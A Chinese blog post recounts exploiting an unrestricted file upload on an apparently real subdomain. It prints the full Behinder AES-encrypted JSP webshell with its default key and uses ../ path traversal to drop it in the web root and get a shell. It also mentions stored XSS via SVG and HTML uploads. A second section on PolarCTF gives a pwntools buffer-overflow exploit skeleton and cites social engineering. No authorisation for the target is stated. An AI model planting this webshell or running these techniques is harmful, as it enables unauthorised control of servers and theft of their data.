任意文件上传漏洞挖掘(getshell)

任意文件上传漏洞挖掘(getshell)

1.在漏洞挖掘过程中进行找到该子域名页面,

在这里插入图片描述

2.没有内容就扫目录,成功发现filemanager/,点击访问

在这里插入图片描述

看到upload页面感觉有惊喜,

在这里插入图片描述

果然有上传功能,点击上传抓包,经测试发现普通jsp会被拦截,蚁剑连不上,所以选择冰蝎马上传,因为冰蝎马默认AES加密

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }

        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
%><%
    if (request.getMethod().equals("POST")) {
        String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
        session.putValue("u", k);
        Cipher c = Cipher.getInstance("AES");
        c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
        new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
    }
%>

在这里插入图片描述

但是没有路径回显,看到path,于是尝试…/上传

在这里插入图片描述

可以看到有路径,在尝试…/…/后

在这里插入图片描述

访问后发现正好是网站根路径

直接尝试冰蝎连接,连接成功

在这里插入图片描述

在这里插入图片描述

至此,成功gethell

当然也可以上传svg,html文件形成存储型XSS,经测试都是可以的,这里完全对上传文件没有限制。

### 关于 PolarCTF 中获取 Shell 的方法与技巧 在 CTF 比赛中,尤其是像 PolarCTF 这样的赛事,获取远程 shell 是一项常见的目标。以下是几种可能的方法和技术: #### 1. 利用已知漏洞 如果题目提供了特定的服务或者程序,可以通过挖掘其中的安全漏洞来实现远程代码执行 (RCE),从而获得 shell。例如,在某些情况下,可能存在缓冲区溢出、命令注入或其他类型的漏洞[^1]。 ```python from pwn import * def exploit(): # 假设这是一个基于网络服务的 PWN 题目 target_ip = "example.com" port = 9999 # 创建连接对象 conn = remote(target_ip, port) # 发送恶意负载以触发 RCE 并返回 shell payload = b"A"*1024 + b"\x31\xc0\x50..." conn.send(payload) # 将交互切换至手动控制模式 conn.interactive() if __name__ == "__main__": exploit() ``` 上述代码片段展示了一个简单的 Python 脚本如何通过 `pwntools` 库发送自定义数据包给目标服务器并尝试获取交互式 shell[^3]。 #### 2. 文件上传/下载机制滥用 当面对具有文件操作功能的应用时,应仔细审查其安全性设计是否存在缺陷。比如允许用户上传任意类型文件而未做严格校验,则可借此植入 webshell 或者其他形式的有效载荷;又或者是存在任意文件读取漏洞的情况下,能够窃取配置文件进而找到更多突破口[^5]。 #### 3. 社会工程学手段配合技术实施 虽然这并不适用于所有场景下的正式竞赛环节里,但在模拟真实世界攻击面的时候不可忽视人为因素的影响——即所谓的社会工程学攻击方式可能会间接辅助完成最终目的[^2]。 #### 4. 学习资源推荐 对于希望进一步提高自己在这方面的技能水平的人来说,《超1800页CTF实战技巧手册》以及《最新网安大厂面试题合集(含答案)》都是非常宝贵的参考资料。同时也要注意构建完整的知识框架以便更好地理解和解决复杂问题[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值